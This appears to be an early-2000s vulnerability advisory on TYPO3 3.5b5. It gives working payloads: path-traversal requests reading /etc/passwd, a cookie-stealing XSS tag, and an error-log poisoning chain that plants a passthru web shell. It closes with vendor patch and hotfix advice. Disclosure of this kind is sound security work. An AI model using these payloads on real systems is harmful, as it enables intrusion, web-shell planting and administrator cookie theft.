hola, ... 2002@WebSec.org/Martin Eiszner ===================== Security REPORT TYPO3 ===================== this document: http://www.websec.org/adv/typo3.html Product: Typo3 (Version 3.5b5 / Earlier versions are possibly vulnerable too) Vendor: Typo3 (http://www.typo3.com) Vendor-Status: kasper@typo3.com informed / new version OUT Vendor-Patch: http://typo3.org/1331.0.html Local: NO Remote: YES Vulnerabilities: -path-disclosure -proof of file-existense -arbitrary file retrieval -arbitrary command execution -CrossSiteScripting / privilege escalation / cookie-theft -install/config files and scripts within webroot Severity: MEDIUM to HIGH Tested Plattforms: Linux / Slackware i686 / Apache 1.3.23 / PHP 4.1.2 ============ Introduction ============ Taken from http://www.typo3.com TYPO3 is a free Open Source content management system for enterprise purposes on the web and in intranets. It offers full flexibility and extendability while featuring an accomplished set of ready-made interfaces, functions and modules. ===================== Vulnerability Details ===================== 0) CLIENT-SIDE DATA-OBFUSCATION form-fields are obfuscated using client-side java-script routines. after the fields are joined a java-script creates MD5-hashes and submits the form. examples: index.php (account-data), showpic.php(name-checksum) attached perl-scripts (typo.pl/showpic.pl) demonstrate how to circumvent this protection. 1) PATH-DISCLOSURE several test-, class- and library-scripts can be found within webroot. some of them can be forced to produce runtime errors and output their physical path. example: /fileadmin/include_test.php 2) PROOF OF FILE-EXISTENCE "showpic.php" and "thumbs.php" allow an attacker to check the existense of arbitrary files. combined with file-enumeration methods it is possible to reconstruct parts of the directory- and filesystem - structure. example on howto check for existing files with attached perl-script "showpic.pl": ---*--- sh> showpic.pl localhost '../../../../../../../../../../etc/hosts' ../../../../../../../../../../etc/hosts exists ---*--- 3) CROSS SITE SCRIPTING / COOKIE-THEFT all system and login-errors are saved in the typo3-database. administrators can view all the erroneous data. since this data is not being checked for XSS-content it is possible to include client-side script(java-script)-tags in these entries. every time the admins view their logs these scripts will be run on the admins web-browser which leads to a typical XSS-bug. thus making it possible to steal the admins-cookies or let him open a new user-account without his knowledge. example with the attached "typo.pl" - perlscript: ---*--- sh> typo.pl localhost '><script>alert(document.cookie)</script><:aaa' ---*--- viewing the logfiles will execute the script. 4) ARBITRARY FILE-RETRIEVAL the "dev/translations.php" - script does not check the ONLY-parameter for malicious values. a relative path combined with a Nullbyte lead to the inclusion of the given file. example http-request: ---*--- GET http://host/dev/translations.php?ONLY=%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd%00 ---*--- 5) ARBITRARY COMMAND EXECUTION extends vulnerability number 4): if the included file contains php-source code it will be executed. thus allowing an attacker to execute operating-system commands and at long sight escalate his privileges. example: ---*--- a file for placing our malicious php-source is needed. if there is no file we have write-access we still can use the websevers-logfiles. the following http-request: ---cut--- http://localhost/<%3f %60echo %27<%3fpassthru(%5c%24c)%3f>%27 >> ./x.php%60 %3f> ---cut--- creates this entry: ---cut--- [Tue Jan 14 19:42:53 2003] [error] [client 127.0.0.1] File does not exist: /apachepath/apache/htdocs/<? `echo '<?passthru(\$c )?>' >> ./x.php` ?> ---cut--- in a typicall apache - error_log file. using the method discussed under 4) the following http-request: ---cut--- http://localhost/typo3/typo3/dev/translations.php?ONLY=relative_apache_path/apache/logs/error_log%00' ---cut--- will include the apach error_log in our output and execute our php-commands. as a result we will find x.php in our "/dev" directory. x.php: ---cut--- <?passthru($c)?> ---cut--- ---*--- 6) SCRIPTS AND DIRECTORIES IN WEBROOT a couple of scripts, libraries, files and directories can be found within typo3s webroot. "/install" is improper protected and vulnerable to brute-force attacks. "/fileadmin" directory reveals log-files and demo-scripts "/typo3conf" directory contains the localconf.php,database.sql and other sensitive files ======= Remarks ======= the serious vulnerabilities rely on the "/dev" (developer?) - directory. scripts within this directory can be found in many/most production-environments! ==================== Recommended Hotfixes ==================== overall) install the new Version ! or 1) remove "/install" directory 2) remove "/dev" directory 3) Choose strong administrator-passwords 4) showpic.php and thumbs.php must be patched. 5) remove all demo-directories and protect "/fileadmin" and "/typo3conf" EOF Martin Eiszner / @2002WebSec.org ======= Contact ======= -- WebSec.org / Martin Eiszner Gurkgasse 49/Top14 1140 Vienna Austria / EUROPE mei@websec.org http://www.websec.org tel: 0043 699 121772 37
Attachment:
typo.pl
Description: Binary data
Attachment:
showpic.pl
Description: Binary data
